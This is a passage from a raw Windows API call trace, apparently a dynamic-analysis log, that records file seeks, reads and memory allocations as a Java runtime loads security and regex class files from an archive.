returned="sun/security/util/DisabledAlgorithmConstraints.class" [0104.147] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294a888, lpNewFilePointer=0x208c890, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c890*=43296904) returned 1 [0104.147] ReadFile (in: hFile=0x134, lpBuffer=0x208c8e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c860, lpOverlapped=0x0 | out: lpBuffer=0x208c8e0*, lpNumberOfBytesRead=0x208c860*=0x1e, lpOverlapped=0x0) returned 1 [0104.148] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294a8da, lpNewFilePointer=0x208c8f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c8f0*=43296986) returned 1 [0104.149] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x1193, lpNumberOfBytesRead=0x208c8c0, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c8c0*=0x1193, lpOverlapped=0x0) returned 1 [0104.150] free (_Block=0x12298c80) [0104.151] free (_Block=0x1228e640) [0104.155] strlen (_Str="sun/security/util/AbstractAlgorithmConstraints.class") returned 0x34 [0104.155] malloc (_Size=0x48) returned 0x1228ef00 [0104.155] malloc (_Size=0xa0) returned 0x122ea270 [0104.155] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e24d0, lpNewFilePointer=0x208c250, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c250*=54404304) returned 1 [0104.155] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c220, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c220*=0xa0, lpOverlapped=0x0) returned 1 [0104.156] malloc (_Size=0x35) returned 0x12298f00 [0104.156] strlen (_Str="sun/security/util/AbstractAlgorithmConstraints.class") returned 0x34 [0104.156] strcpy (in: _Dest=0x208c3d0, _Source="sun/security/util/AbstractAlgorithmConstraints.class" | out: _Dest="sun/security/util/AbstractAlgorithmConstraints.class") returned="sun/security/util/AbstractAlgorithmConstraints.class" [0104.156] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2930bd4, lpNewFilePointer=0x208be50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be50*=43191252) returned 1 [0104.156] ReadFile (in: hFile=0x134, lpBuffer=0x208bea0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be20, lpOverlapped=0x0 | out: lpBuffer=0x208bea0*, lpNumberOfBytesRead=0x208be20*=0x1e, lpOverlapped=0x0) returned 1 [0104.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2930c26, lpNewFilePointer=0x208beb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208beb0*=43191334) returned 1 [0104.172] ReadFile (in: hFile=0x134, lpBuffer=0x1227f490, nNumberOfBytesToRead=0x6c9, lpNumberOfBytesRead=0x208be80, lpOverlapped=0x0 | out: lpBuffer=0x1227f490*, lpNumberOfBytesRead=0x208be80*=0x6c9, lpOverlapped=0x0) returned 1 [0104.176] free (_Block=0x12298b40) [0104.176] free (_Block=0x1228ee10) [0104.177] strlen (_Str="java/security/AlgorithmConstraints.class") returned 0x28 [0104.177] malloc (_Size=0x48) returned 0x1228edc0 [0104.177] malloc (_Size=0xa0) returned 0x122ea270 [0104.177] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3330d51, lpNewFilePointer=0x208b790, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b790*=53677393) returned 1 [0104.178] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b760, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208b760*=0xa0, lpOverlapped=0x0) returned 1 [0104.181] malloc (_Size=0x29) returned 0x12298640 [0104.182] strlen (_Str="java/security/AlgorithmConstraints.class") returned 0x28 [0104.182] strcpy (in: _Dest=0x208b910, _Source="java/security/AlgorithmConstraints.class" | out: _Dest="java/security/AlgorithmConstraints.class") returned="java/security/AlgorithmConstraints.class" [0104.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1773b02, lpNewFilePointer=0x208b390, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b390*=24591106) returned 1 [0104.182] ReadFile (in: hFile=0x134, lpBuffer=0x208b3e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b360, lpOverlapped=0x0 | out: lpBuffer=0x208b3e0*, lpNumberOfBytesRead=0x208b360*=0x1e, lpOverlapped=0x0) returned 1 [0104.198] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1773b48, lpNewFilePointer=0x208b3f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3f0*=24591176) returned 1 [0104.199] ReadFile (in: hFile=0x134, lpBuffer=0x1227fd20, nNumberOfBytesToRead=0x29d, lpNumberOfBytesRead=0x208b3c0, lpOverlapped=0x0 | out: lpBuffer=0x1227fd20*, lpNumberOfBytesRead=0x208b3c0*=0x29d, lpOverlapped=0x0) returned 1 [0104.199] free (_Block=0x12298f00) [0104.200] free (_Block=0x1228ef00) [0104.208] malloc (_Size=0x48) returned 0x1228eb90 [0104.208] malloc (_Size=0xa0) returned 0x122ea270 [0104.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2532, lpNewFilePointer=0x208cc10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cc10*=54404402) returned 1 [0104.208] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cbe0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208cbe0*=0xa0, lpOverlapped=0x0) returned 1 [0104.208] malloc (_Size=0x2c) returned 0x12298380 [0104.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29312ef, lpNewFilePointer=0x208c810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c810*=43193071) returned 1 [0104.208] ReadFile (in: hFile=0x134, lpBuffer=0x208c860, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c7e0, lpOverlapped=0x0 | out: lpBuffer=0x208c860*, lpNumberOfBytesRead=0x208c7e0*=0x1e, lpOverlapped=0x0) returned 1 [0104.208] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2931338, lpNewFilePointer=0x208c870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c870*=43193144) returned 1 [0104.208] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0xa3a, lpNumberOfBytesRead=0x208c840, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c840*=0xa3a, lpOverlapped=0x0) returned 1 [0104.209] malloc (_Size=0x48) returned 0x1228ed20 [0104.209] malloc (_Size=0xa0) returned 0x122ea270 [0104.209] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x334a11d, lpNewFilePointer=0x208c350, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c350*=53780765) returned 1 [0104.210] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c320, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c320*=0xa0, lpOverlapped=0x0) returned 1 [0104.211] malloc (_Size=0x1e) returned 0x12221ae0 [0104.211] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a0863c, lpNewFilePointer=0x208bf50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf50*=27297340) returned 1 [0104.211] ReadFile (in: hFile=0x134, lpBuffer=0x208bfa0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bf20, lpOverlapped=0x0 | out: lpBuffer=0x208bfa0*, lpNumberOfBytesRead=0x208bf20*=0x1e, lpOverlapped=0x0) returned 1 [0104.216] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a08677, lpNewFilePointer=0x208bfb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bfb0*=27297399) returned 1 [0104.216] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x7a0d, lpNumberOfBytesRead=0x208bf80, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208bf80*=0x7a0d, lpOverlapped=0x0) returned 1 [0104.224] malloc (_Size=0x48) returned 0x1228edc0 [0104.224] malloc (_Size=0xa0) returned 0x122ea270 [0104.224] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3348203, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=53772803) returned 1 [0104.224] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bca0*=0xa0, lpOverlapped=0x0) returned 1 [0104.225] malloc (_Size=0x20) returned 0x12221ea0 [0104.226] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f4686, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=27215494) returned 1 [0104.226] ReadFile (in: hFile=0x134, lpBuffer=0x208b920, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b8a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.228] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f46c3, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=27215555) returned 1 [0104.228] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x1bc, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208b900*=0x1bc, lpOverlapped=0x0) returned 1 [0104.229] malloc (_Size=0x48) returned 0x1228e5a0 [0104.229] malloc (_Size=0xa0) returned 0x122ea270 [0104.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33498ba, lpNewFilePointer=0x208b290, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b290*=53778618) returned 1 [0104.229] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b260, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208b260*=0xa0, lpOverlapped=0x0) returned 1 [0104.229] malloc (_Size=0x23) returned 0x12221ae0 [0104.229] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a038df, lpNewFilePointer=0x208ae90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae90*=27277535) returned 1 [0104.229] ReadFile (in: hFile=0x134, lpBuffer=0x208aee0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ae60, lpOverlapped=0x0 | out: lpBuffer=0x208aee0*, lpNumberOfBytesRead=0x208ae60*=0x1e, lpOverlapped=0x0) returned 1 [0104.231] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a0391f, lpNewFilePointer=0x208aef0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aef0*=27277599) returned 1 [0104.231] ReadFile (in: hFile=0x134, lpBuffer=0x1227e270, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x208aec0, lpOverlapped=0x0 | out: lpBuffer=0x1227e270*, lpNumberOfBytesRead=0x208aec0*=0x2d0, lpOverlapped=0x0) returned 1 [0104.232] free (_Block=0x12221ea0) [0104.240] free (_Block=0x1228edc0) [0104.250] strlen (_Str="java/util/regex/Pattern$LastNode.class") returned 0x26 [0104.250] malloc (_Size=0x48) returned 0x1228ea00 [0104.250] malloc (_Size=0xa0) returned 0x122ea270 [0104.250] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x334971d, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=53778205) returned 1 [0104.250] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208bca0*=0xa0, lpOverlapped=0x0) returned 1 [0104.250] malloc (_Size=0x27) returned 0x12221ea0 [0104.251] strlen (_Str="java/util/regex/Pattern$LastNode.class") returned 0x26 [0104.251] strcpy (in: _Dest=0x208be50, _Source="java/util/regex/Pattern$LastNode.class" | out: _Dest="java/util/regex/Pattern$LastNode.class") returned="java/util/regex/Pattern$LastNode.class" [0104.251] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a025d0, lpNewFilePointer=0x208b8d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b8d0*=27272656) returned 1 [0104.251] ReadFile (in: hFile=0x134, lpBuffer=0x208b920, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b8a0, lpOverlapped=0x0 | out: lpBuffer=0x208b920*, lpNumberOfBytesRead=0x208b8a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.252] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a02614, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=27272724) returned 1 [0104.252] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x217, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b900*=0x217, lpOverlapped=0x0) returned 1 [0104.252] free (_Block=0x12221ae0) [0104.253] free (_Block=0x1228e5a0) [0104.262] strlen (_Str="java/util/regex/Pattern$GroupHead.class") returned 0x27 [0104.262] malloc (_Size=0x48) returned 0x1228e190 [0104.262] malloc (_Size=0xa0) returned 0x122ea270 [0104.262] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349577, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=53777783) returned 1 [0104.262] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c4a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.262] malloc (_Size=0x28) returned 0x12221ae0 [0104.262] strlen (_Str="java/util/regex/Pattern$GroupHead.class") returned 0x27 [0104.263] strcpy (in: _Dest=0x208c650, _Source="java/util/regex/Pattern$GroupHead.class" | out: _Dest="java/util/regex/Pattern$GroupHead.class") returned="java/util/regex/Pattern$GroupHead.class" [0104.263] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a017d3, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=27269075) returned 1 [0104.263] ReadFile (in: hFile=0x134, lpBuffer=0x208c120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x208c120*, lpNumberOfBytesRead=0x208c0a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.264] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a01818, lpNewFilePointer=0x208c130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c130*=27269144) returned 1 [0104.264] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x276, lpNumberOfBytesRead=0x208c100, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c100*=0x276, lpOverlapped=0x0) returned 1 [0104.265] free (_Block=0x12221ea0) [0104.265] free (_Block=0x1228ea00) [0104.271] strlen (_Str="java/util/regex/Pattern$Single.class") returned 0x24 [0104.271] malloc (_Size=0x48) returned 0x1228f040 [0104.271] malloc (_Size=0xa0) returned 0x122ea270 [0104.271] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349af8, lpNewFilePointer=0x208c2b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2b0*=53779192) returned 1 [0104.271] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c280, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c280*=0xa0, lpOverlapped=0x0) returned 1 [0104.271] malloc (_Size=0x25) returned 0x12221ea0 [0104.271] strlen (_Str="java/util/regex/Pattern$Single.class") returned 0x24 [0104.272] strcpy (in: _Dest=0x208c430, _Source="java/util/regex/Pattern$Single.class" | out: _Dest="java/util/regex/Pattern$Single.class") returned="java/util/regex/Pattern$Single.class" [0104.272] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a05101, lpNewFilePointer=0x208beb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208beb0*=27283713) returned 1 [0104.272] ReadFile (in: hFile=0x134, lpBuffer=0x208bf00, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208be80, lpOverlapped=0x0 | out: lpBuffer=0x208bf00*, lpNumberOfBytesRead=0x208be80*=0x1e, lpOverlapped=0x0) returned 1 [0104.273] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a05143, lpNewFilePointer=0x208bf10, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bf10*=27283779) returned 1 [0104.273] ReadFile (in: hFile=0x134, lpBuffer=0x20fe990, nNumberOfBytesToRead=0x1ca, lpNumberOfBytesRead=0x208bee0, lpOverlapped=0x0 | out: lpBuffer=0x20fe990*, lpNumberOfBytesRead=0x208bee0*=0x1ca, lpOverlapped=0x0) returned 1 [0104.273] free (_Block=0x12221ae0) [0104.274] free (_Block=0x1228e190) [0104.279] strlen (_Str="java/util/regex/Pattern$BmpCharProperty.class") returned 0x2d [0104.279] malloc (_Size=0x48) returned 0x1228e5a0 [0104.279] malloc (_Size=0xa0) returned 0x122ea270 [0104.279] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3348574, lpNewFilePointer=0x208b870, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b870*=53773684) returned 1 [0104.280] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b840, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208b840*=0xa0, lpOverlapped=0x0) returned 1 [0104.280] malloc (_Size=0x2e) returned 0x12298580 [0104.280] strlen (_Str="java/util/regex/Pattern$BmpCharProperty.class") returned 0x2d [0104.280] strcpy (in: _Dest=0x208b9f0, _Source="java/util/regex/Pattern$BmpCharProperty.class" | out: _Dest="java/util/regex/Pattern$BmpCharProperty.class") returned="java/util/regex/Pattern$BmpCharProperty.class" [0104.280] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f69d4, lpNewFilePointer=0x208b470, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b470*=27224532) returned 1 [0104.281] ReadFile (in: hFile=0x134, lpBuffer=0x208b4c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b440, lpOverlapped=0x0 | out: lpBuffer=0x208b4c0*, lpNumberOfBytesRead=0x208b440*=0x1e, lpOverlapped=0x0) returned 1 [0104.285] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f6a1f, lpNewFilePointer=0x208b4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b4d0*=27224607) returned 1 [0104.285] ReadFile (in: hFile=0x134, lpBuffer=0x1227e280, nNumberOfBytesToRead=0x338, lpNumberOfBytesRead=0x208b4a0, lpOverlapped=0x0 | out: lpBuffer=0x1227e280*, lpNumberOfBytesRead=0x208b4a0*=0x338, lpOverlapped=0x0) returned 1 [0104.286] free (_Block=0x12221ea0) [0104.286] free (_Block=0x1228f040) [0104.289] strlen (_Str="java/util/regex/Pattern$CharProperty.class") returned 0x2a [0104.289] malloc (_Size=0x48) returned 0x1228ed20 [0104.289] malloc (_Size=0xa0) returned 0x122ea270 [0104.289] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33488bb, lpNewFilePointer=0x208ae30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ae30*=53774523) returned 1 [0104.290] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ae00, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ae00*=0xa0, lpOverlapped=0x0) returned 1 [0104.290] malloc (_Size=0x2b) returned 0x12298ac0 [0104.290] strlen (_Str="java/util/regex/Pattern$CharProperty.class") returned 0x2a [0104.290] strcpy (in: _Dest=0x208afb0, _Source="java/util/regex/Pattern$CharProperty.class" | out: _Dest="java/util/regex/Pattern$CharProperty.class") returned="java/util/regex/Pattern$CharProperty.class" [0104.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f9614, lpNewFilePointer=0x208aa30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aa30*=27235860) returned 1 [0104.290] ReadFile (in: hFile=0x134, lpBuffer=0x208aa80, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208aa00, lpOverlapped=0x0 | out: lpBuffer=0x208aa80*, lpNumberOfBytesRead=0x208aa00*=0x1e, lpOverlapped=0x0) returned 1 [0104.291] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f965c, lpNewFilePointer=0x208aa90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208aa90*=27235932) returned 1 [0104.291] ReadFile (in: hFile=0x134, lpBuffer=0x1227e780, nNumberOfBytesToRead=0x4d0, lpNumberOfBytesRead=0x208aa60, lpOverlapped=0x0 | out: lpBuffer=0x1227e780*, lpNumberOfBytesRead=0x208aa60*=0x4d0, lpOverlapped=0x0) returned 1 [0104.292] free (_Block=0x12298580) [0104.293] free (_Block=0x1228e5a0) [0104.298] malloc (_Size=0x48) returned 0x1228f040 [0104.298] malloc (_Size=0xa0) returned 0x122ea270 [0104.298] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349c43, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=53779523) returned 1 [0104.298] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c4a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.298] malloc (_Size=0x24) returned 0x12221ae0 [0104.298] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a059be, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=27285950) returned 1 [0104.298] ReadFile (in: hFile=0x134, lpBuffer=0x208c120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x208c120*, lpNumberOfBytesRead=0x208c0a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.298] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a059ff, lpNewFilePointer=0x208c130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c130*=27286015) returned 1 [0104.298] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x208c100, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c100*=0x2cf, lpOverlapped=0x0) returned 1 [0104.299] malloc (_Size=0x48) returned 0x1228ee10 [0104.299] malloc (_Size=0xa0) returned 0x122ea270 [0104.299] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349d39, lpNewFilePointer=0x208ba90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba90*=53779769) returned 1 [0104.299] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ba60, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208ba60*=0xa0, lpOverlapped=0x0) returned 1 [0104.299] malloc (_Size=0x28) returned 0x12221ea0 [0104.299] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a063f1, lpNewFilePointer=0x208b690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b690*=27288561) returned 1 [0104.299] ReadFile (in: hFile=0x134, lpBuffer=0x208b6e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b660, lpOverlapped=0x0 | out: lpBuffer=0x208b6e0*, lpNumberOfBytesRead=0x208b660*=0x1e, lpOverlapped=0x0) returned 1 [0104.302] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a06436, lpNewFilePointer=0x208b6f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6f0*=27288630) returned 1 [0104.302] ReadFile (in: hFile=0x134, lpBuffer=0x1227e5b0, nNumberOfBytesToRead=0x238, lpNumberOfBytesRead=0x208b6c0, lpOverlapped=0x0 | out: lpBuffer=0x1227e5b0*, lpNumberOfBytesRead=0x208b6c0*=0x238, lpOverlapped=0x0) returned 1 [0104.303] malloc (_Size=0x48) returned 0x1228e410 [0104.303] malloc (_Size=0xa0) returned 0x122ea270 [0104.303] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33483d9, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=53773273) returned 1 [0104.303] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c4a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.303] malloc (_Size=0x24) returned 0x12221ae0 [0104.303] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f57e0, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=27219936) returned 1 [0104.304] ReadFile (in: hFile=0x134, lpBuffer=0x208c120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x208c120*, lpNumberOfBytesRead=0x208c0a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.304] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x19f5821, lpNewFilePointer=0x208c130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c130*=27220001) returned 1 [0104.304] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x26f, lpNumberOfBytesRead=0x208c100, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c100*=0x26f, lpOverlapped=0x0) returned 1 [0104.305] malloc (_Size=0x48) returned 0x1228e9b0 [0104.305] malloc (_Size=0xa0) returned 0x122ea270 [0104.305] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33494d0, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=53777616) returned 1 [0104.305] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c4a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.305] malloc (_Size=0x24) returned 0x12221ea0 [0104.306] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a009d6, lpNewFilePointer=0x208c0d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0d0*=27265494) returned 1 [0104.306] ReadFile (in: hFile=0x134, lpBuffer=0x208c120, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c0a0, lpOverlapped=0x0 | out: lpBuffer=0x208c120*, lpNumberOfBytesRead=0x208c0a0*=0x1e, lpOverlapped=0x0) returned 1 [0104.307] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1a00a17, lpNewFilePointer=0x208c130, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c130*=27265559) returned 1 [0104.307] ReadFile (in: hFile=0x134, lpBuffer=0x1227e120, nNumberOfBytesToRead=0x453, lpNumberOfBytesRead=0x208c100, lpOverlapped=0x0 | out: lpBuffer=0x1227e120*, lpNumberOfBytesRead=0x208c100*=0x453, lpOverlapped=0x0) returned 1 [0104.307] malloc (_Size=0x48) returned 0x1228e410 [0104.307] malloc (_Size=0xa0) returned 0x122ea270 [0104.307] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3349e85, lpNewFilePointer=0x208c4d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4d0*=53780101) returned 1 [0104.307] ReadFile (in: hFile=0x134, lpBuffer=0x122ea270, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c4a0, lpOverlapped=0x0 | out: lpBuffer=0x122ea270*, lpNumberOfBytesRead=0x208c4a0*=0xa0, lpOverlapped=0x0) returned 1 [0104.308] malloc 